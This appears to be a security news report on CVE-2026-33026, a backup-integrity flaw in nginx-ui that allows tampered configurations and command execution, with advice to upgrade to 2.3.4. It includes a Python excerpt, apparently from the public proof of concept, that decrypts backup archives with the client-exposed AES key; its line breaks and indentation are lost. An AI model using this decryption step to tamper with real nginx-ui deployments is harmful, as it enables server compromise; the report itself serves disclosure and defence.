A critical security flaw in the nginx-ui backup restore mechanism, tracked as CVE-2026-33026, allows attackers to manipulate encrypted backups and execute arbitrary commands.
Proof-of-Concept (PoC) exploit code has been publicly released, prompting an urgent need for administrators to update to version 2.3.4.
Backup Integrity Bypass Flaw
The vulnerability stems from a circular trust model where the backup format lacks a secure integrity root.
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(encrypted_data)
return unpad(decrypted, AES.block_size)with zipfile.ZipFile(file_path, 'r') as main_zip:
main_zip.extractall(output_dir)
files_to_decrypt = ["hash_info.txt", "nginx-ui.zip", "nginx.zip"]
for filename in files_to_decrypt:
path = os.path.join(output_dir, filename)
if os.path.exists(path):
with open(path, "rb") as f:
encrypted = f.read()
decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)
out_path = path + ".decrypted"
with open(out_path, "wb") as f:
f.write(decrypted)
print(f"[*] Successfully decrypted: {out_path}")The application provides the AES encryption key and Initialization Vector (IV) directly to the client as a security token, which encrypts both the data and the integrity metadata, as reported by Security Researcher 0xJacky.
Attackers can use this token to decrypt the archive, alter configuration files, update the SHA-256 hashes, and re-encrypt the bundle for restoration.
Because the restore process accepts the modified integrity metadata generated by the attacker, malicious configurations are seamlessly applied to the server environment.
This manipulation grants threat actors the ability to insert backdoors and achieve arbitrary command execution on the host machine.
The exploit operates silently regardless of hash mismatches, potentially leading to a complete compromise of the nginx-ui deployment.
Administrators must immediately upgrade their nginx-ui installations to the patched version 2.3.4 to secure their infrastructure.
Developers are advised to introduce a trusted integrity root, such as signing backup metadata using a server-side private key rather than client-exposed tokens.
Furthermore, enforcing strict server-side integrity verification during the restore process will prevent attacker-controlled data from being processed entirely.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
